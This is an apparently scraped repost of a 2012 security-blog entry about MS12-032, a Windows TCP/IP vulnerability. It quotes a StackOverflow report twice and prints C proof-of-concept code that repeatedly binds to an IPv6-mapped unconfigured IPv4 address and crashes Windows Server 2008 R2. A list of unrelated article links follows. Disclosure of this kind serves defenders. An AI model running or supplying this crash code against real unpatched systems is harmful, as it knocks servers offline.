MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
来源:互联网 发布:阿里云国际版云免翻墙 编辑:程序博客网 时间:2024/05/17 21:54
Microsoft update release http://technet.microsoft.com/en-us/security/bulletin/ms12-032
Possible MS12-032 Proof of concept from StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.
from :
Possible MS12-032 Proof of concept from StackOverflow thx to @avivra
We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines of C code using Winsock2 APIs. The sample repeatedly binds to IPv6-mapped invalid IPv4 address. Windows Server 2008 R2 crashes after several seconds running the sample. The problem reproduces on different physical machines as well as on Virtual Machines.
from :
http://security-sh3ll.blogspot.com/2012/05/ms12-032-vulnerability-in-tcpip-could.html
// the program attempts to bind to IPV6-mapped IPV4 address// in a tight loop. If the address is not configured on the machine// running the program crashes Windows Server 2008 R2 (if program is 32-bit)#include #include #include #include #define IPV6_V6ONLY 27void MyWsaStartup(){WORD wVersionRequested;WSADATA wsaData;int err;wVersionRequested = MAKEWORD(2, 2);err = WSAStartup(wVersionRequested, &wsaData);if (err != 0) {printf("WSAStartup failed with error: %d\n", err);exit(-1);}}void main(){MyWsaStartup();bool bindSuccess = false;while(!bindSuccess){SOCKET sock = WSASocket(AF_INET6,SOCK_DGRAM,IPPROTO_UDP,NULL,0,WSA_FLAG_OVERLAPPED);if(sock == INVALID_SOCKET){printf("WSASocket failed\n");exit(-1);}DWORD val = 0;if (setsockopt(sock,IPPROTO_IPV6,IPV6_V6ONLY,(const char*)&val,sizeof(val)) != 0){printf("setsockopt failed\n");closesocket(sock);exit(-1);}sockaddr_in6 sockAddr;memset(&sockAddr, 0, sizeof(sockAddr));sockAddr.sin6_family = AF_INET6;sockAddr.sin6_port = htons(5060);// set address to IPV6-mapped 169.13.13.13 (not configured on the local machine)// that is [::FFFF:169.13.13.13]sockAddr.sin6_addr.u.Byte[15] = 13;sockAddr.sin6_addr.u.Byte[14] = 13;sockAddr.sin6_addr.u.Byte[13] = 13;sockAddr.sin6_addr.u.Byte[12] = 169;sockAddr.sin6_addr.u.Byte[11] = 0xFF;sockAddr.sin6_addr.u.Byte[10] = 0xFF;int size = 28; // 28 is sizeof(sockaddr_in6)int nRet = bind(sock, (sockaddr*)&sockAddr, size);if(nRet == SOCKET_ERROR){closesocket(sock);Sleep(100);}else{bindSuccess = true;printf("bind succeeded\n");closesocket(sock);}}}
- MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
- MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
- Linux Kernel Samba Share Local Privilege Elevation Vulnerability
- Elevation of Privilege (EoP) Card Game
- MS08-066 Microsoft Ancillary Function Driver Elevation of Privilege exploit
- CVE-2014-6283: Privilege Escalation Vulnerability and Potential Remote Code Execution in SAP Adaptiv
- Apache suEXEC Privilege Elevation / Information Disclosure
- Apache suEXEC Privilege Elevation / Information Disclosure
- Increasing the maximum number of tcp/ip connections in linux
- Debian 'login' Local Privilege Escalation Vulnerability
- Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
- Linux Kernel 'fasync_helper()' Local Privilege Escalation Vulnerability
- Joomla! 1.6/1.7/2.5 Privilege Escalation Vulnerability
- MS12-032的POC
- Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
- Linux Kernel Controller Area Network Protocol Local Privilege Escalation Vulnerability
- Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
- MetaSploit Framework 'pcap_log' Plugin Local Privilege Escalation Vulnerability
- php-Arrays 函数-array_diff_ukey-用回调函数对键名比较计算数组的差集
- ietester 打开ie6选项卡时,出现奔溃情况的解决
- Hibernate自定义方言
- JAVA中定义数组的各种方法
- c#有用数据类型转换
- MS12-032 - Vulnerability in TCP/IP Could Allow Elevation of Privilege
- 不用专业的软件就可以将wav转化为MP3格式
- activity的生命周期之我见
- Hashmap详解
- 海量数据转储备忘及C#的SqlBulkCopy类使用说明
- 高通Wi-Fi显示技术:电视机同步显示手机画面
- IIS HTTP 500 - 内部服务器错误 之三步解决方案
- 错误 执行Transact-SQL语句批处理时发生了异常。无法设置主体'sa'的凭据
- java实现CORBA